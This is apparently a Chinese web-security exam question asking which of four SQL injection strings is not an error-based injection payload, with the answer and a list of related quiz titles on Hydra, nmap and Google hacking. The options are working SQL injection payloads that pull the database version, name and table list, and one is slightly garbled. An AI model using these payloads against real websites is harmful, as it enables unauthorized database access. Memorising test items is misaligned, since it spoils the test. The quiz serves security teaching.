单选题
9下列( )不是SQLi 报错注入公式
A
A. ?id=1’ and extractvalue(1,concat(’^’,(select version()),’^’)) --+
B
B. ?id=1’ and (select 1 from (select count(),concat((select version() from information_schema.tables limit 0,1),floor(rand()2))x from information_schema.tables group by x)a) --+
C
C. ?id=1’ and updatexml(1,concat(’^’,(select database()),’^’),1) --+
D
D. ?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
答案解析
正确答案:D
相关题目
单选题
13.在Google Hacking 中,下面哪一个是搜索指定文件类型的语句()
单选题
12.aspx 的网站配置文件一般存放在哪个文件里()
单选题
11.下列选项中不是Hydra 工具中的 -e 参数的值是()
单选题
10.下列工具中可以对Web表单进行暴力破解的是?( )
单选题
9.在远程管理Linux服务器时,以下( )方式采用加密的数据传输。
单选题
8.Hydra 工具中的 -L 参数的含义是()
单选题
7.扫描器之王NMAP中,全面扫描的命令是什么()
单选题
6.以下哪个是常用WEB漏洞扫描工具()
单选题
5.在HTTP 状态码中表示重定向的是()
单选题
4.nmap的-sV是什么操作()
